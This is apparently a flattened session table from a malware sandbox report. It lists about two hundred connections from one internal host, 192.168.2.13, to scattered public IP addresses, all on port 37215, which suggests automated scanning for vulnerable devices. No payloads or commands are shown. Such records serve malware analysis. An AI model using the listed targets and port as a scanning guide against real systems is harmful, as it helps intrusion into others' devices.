                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11663192.168.2.1349944157.66.202.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11664192.168.2.1358434157.112.101.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11665192.168.2.1360022197.197.190.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11666192.168.2.1349096157.6.161.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11667192.168.2.1350502157.111.64.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11668192.168.2.1334946186.233.228.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11669192.168.2.1346496197.218.203.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11670192.168.2.1346336157.52.202.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11671192.168.2.1334364197.237.152.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11672192.168.2.1335160197.12.140.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11673192.168.2.1338264197.139.50.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11674192.168.2.1334412197.139.4.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11675192.168.2.1347610157.145.11.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11676192.168.2.1354328157.226.56.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11677192.168.2.1352422157.150.110.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11678192.168.2.1349790157.162.248.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11679192.168.2.135056241.81.23.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11680192.168.2.1356016197.121.223.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11681192.168.2.1341520197.241.44.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11682192.168.2.134147041.169.179.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11683192.168.2.1355548157.245.5.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11684192.168.2.1334376197.103.67.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11685192.168.2.134661641.86.245.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11686192.168.2.1350582157.142.46.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11687192.168.2.1337180104.211.132.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11688192.168.2.1355598223.3.132.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11689192.168.2.1357230157.123.238.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11690192.168.2.134072241.120.217.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11691192.168.2.1359590197.246.166.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11692192.168.2.136065041.177.131.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11693192.168.2.1337558197.202.133.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11694192.168.2.1344828211.49.5.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11695192.168.2.1349658195.239.83.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11696192.168.2.135421441.76.88.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11697192.168.2.134640041.145.192.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11698192.168.2.1348608136.151.106.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11699192.168.2.1345540143.75.63.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11700192.168.2.1360806157.166.226.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11701192.168.2.133376841.72.74.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11702192.168.2.1340636197.102.205.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11703192.168.2.134373823.105.158.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11704192.168.2.1334920157.142.184.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11705192.168.2.133385841.67.180.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11706192.168.2.1351514197.12.31.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11707192.168.2.135809441.71.72.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11708192.168.2.1360378197.106.40.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11709192.168.2.135933825.229.27.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11710192.168.2.1342198157.28.253.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11711192.168.2.136026841.74.157.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11712192.168.2.1353364197.204.119.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11713192.168.2.134813241.244.145.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11714192.168.2.134092041.223.10.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11715192.168.2.1353658197.99.98.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11716192.168.2.135171441.229.101.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11717192.168.2.135866841.178.137.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11718192.168.2.1351470157.53.213.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11719192.168.2.135315684.74.82.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11720192.168.2.1354412197.73.184.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11721192.168.2.134426648.232.173.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11722192.168.2.133650441.36.211.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11723192.168.2.133945041.163.60.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11724192.168.2.1334258157.184.152.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11725192.168.2.135548041.44.202.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11726192.168.2.135022641.168.24.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11727192.168.2.1350184157.13.18.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11728192.168.2.1344900157.187.20.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11729192.168.2.1343258197.201.34.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11730192.168.2.1356886158.114.139.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11731192.168.2.1334716160.251.75.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11732192.168.2.135524041.12.240.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11733192.168.2.1343722197.6.38.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11734192.168.2.133333641.126.112.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11735192.168.2.135836641.181.131.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11736192.168.2.1351966160.95.120.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11737192.168.2.1351542157.168.149.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11738192.168.2.1351464111.90.8.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11739192.168.2.134181454.189.228.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11740192.168.2.1346674197.47.173.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11741192.168.2.1356146193.60.212.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11742192.168.2.1343596157.241.80.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11743192.168.2.1353828197.170.200.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11744192.168.2.1344266157.122.33.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11745192.168.2.1339932197.203.182.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11746192.168.2.1355466197.182.224.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11747192.168.2.135877241.111.105.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11748192.168.2.1332964157.59.121.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11749192.168.2.1345700197.79.179.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11750192.168.2.135679041.87.133.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11751192.168.2.134878836.33.182.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11752192.168.2.1337504151.141.105.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11753192.168.2.1360922197.22.227.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11754192.168.2.1349870194.138.59.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11755192.168.2.1333220157.196.150.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11756192.168.2.1351538157.89.22.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11757192.168.2.1346106101.93.89.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11758192.168.2.134079641.220.145.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11759192.168.2.133962265.75.142.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11760192.168.2.1353396157.96.18.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11761192.168.2.133360841.173.53.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11762192.168.2.1336924197.126.145.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11763192.168.2.1355026157.17.181.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11764192.168.2.1342492197.15.224.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11765192.168.2.135935841.191.89.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11766192.168.2.1351040157.192.51.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11767192.168.2.134665089.167.153.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11768192.168.2.1348190197.77.71.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11769192.168.2.135868236.158.40.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11770192.168.2.1360336157.191.37.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11771192.168.2.1355994157.43.7.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11772192.168.2.134510284.147.148.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11773192.168.2.133538241.26.105.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11774192.168.2.135687641.254.82.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11775192.168.2.1339060164.6.223.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11776192.168.2.1351982197.78.58.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11777192.168.2.1344788157.180.165.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11778192.168.2.1359586157.169.111.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11779192.168.2.1349164157.121.99.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11780192.168.2.133347041.202.102.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11781192.168.2.133351441.216.24.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11782192.168.2.1357232197.123.108.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11783192.168.2.1354162157.191.239.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11784192.168.2.1360604197.107.19.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11785192.168.2.134405041.147.72.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11786192.168.2.1356466197.86.248.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11787192.168.2.1340900199.73.69.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11788192.168.2.134460441.180.69.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11789192.168.2.1357330197.40.173.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11790192.168.2.135328241.112.159.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11791192.168.2.135344641.184.0.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11792192.168.2.133791089.81.85.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11793192.168.2.134001259.193.212.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11794192.168.2.135801641.104.151.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11795192.168.2.1341316197.213.121.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11796192.168.2.1344026157.201.9.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11797192.168.2.133642289.103.63.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11798192.168.2.134772041.106.84.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11799192.168.2.133487041.192.103.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11800192.168.2.1336160197.24.52.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11801192.168.2.1337022181.73.248.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11802192.168.2.1335844101.114.178.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11803192.168.2.134926441.231.200.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11804192.168.2.1333976157.112.16.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11805192.168.2.135851841.124.38.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11806192.168.2.133361243.172.122.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11807192.168.2.1352084157.186.166.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11808192.168.2.1347172157.72.95.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11809192.168.2.1359684197.85.67.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11810192.168.2.1355620197.28.73.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11811192.168.2.134125841.79.191.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11812192.168.2.1341438197.19.110.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11813192.168.2.1335366157.78.118.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11814192.168.2.135708619.221.125.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11815192.168.2.1339246157.142.115.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11816192.168.2.135664041.82.29.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11817192.168.2.134902012.62.57.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11818192.168.2.1355526197.14.84.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11819192.168.2.134757841.17.89.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11820192.168.2.1343560223.95.56.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11821192.168.2.1352620157.86.110.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11822192.168.2.1343210197.210.89.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11823192.168.2.135711413.13.39.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11824192.168.2.134101451.150.196.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11825192.168.2.135800441.204.178.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11826192.168.2.1343154157.112.134.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11827192.168.2.1342092136.238.83.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11828192.168.2.1359036197.48.25.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11829192.168.2.134448641.168.94.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11830192.168.2.136084882.58.4.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11831192.168.2.1339984197.132.4.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11832192.168.2.134998641.158.207.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11833192.168.2.134282241.107.101.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11834192.168.2.1359450197.203.7.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11835192.168.2.1354826197.62.92.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11836192.168.2.1352526125.157.58.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11837192.168.2.1356996157.163.159.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11838192.168.2.1345712100.225.61.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11839192.168.2.1339860197.146.229.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11840192.168.2.1345170157.127.77.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11841192.168.2.1334566157.21.15.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11842192.168.2.1342128157.240.24.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11843192.168.2.135767245.233.84.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11844192.168.2.135237841.136.190.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11845192.168.2.135912241.209.110.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11846192.168.2.1334192157.22.169.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11847192.168.2.134771281.100.93.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11848192.168.2.134740441.133.169.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11849192.168.2.135926641.83.226.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11850192.168.2.133387441.41.122.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11851192.168.2.133683441.34.174.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11852192.168.2.1343070206.214.95.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11853192.168.2.1360812197.93.105.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11854192.168.2.1348638111.121.167.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11855192.168.2.135025841.86.252.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11856192.168.2.134496241.45.183.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11857192.168.2.135775841.232.81.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11858192.168.2.1337998197.43.27.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11859192.168.2.1355986197.105.214.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11860192.168.2.133400441.194.122.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11861192.168.2.1357542157.132.39.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11862192.168.2.1339034170.93.210.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11863192.168.2.134944641.67.137.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11864192.168.2.135643248.16.65.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11865192.168.2.1347956167.162.90.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11866192.168.2.1343436197.85.154.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11867192.168.2.134411641.39.250.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11868192.168.2.135479641.155.153.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11869192.168.2.1342938197.129.37.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11870192.168.2.1347606197.20.93.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11871192.168.2.135989241.99.64.13337215
                                                  TimestampBytes transferredDirectionData


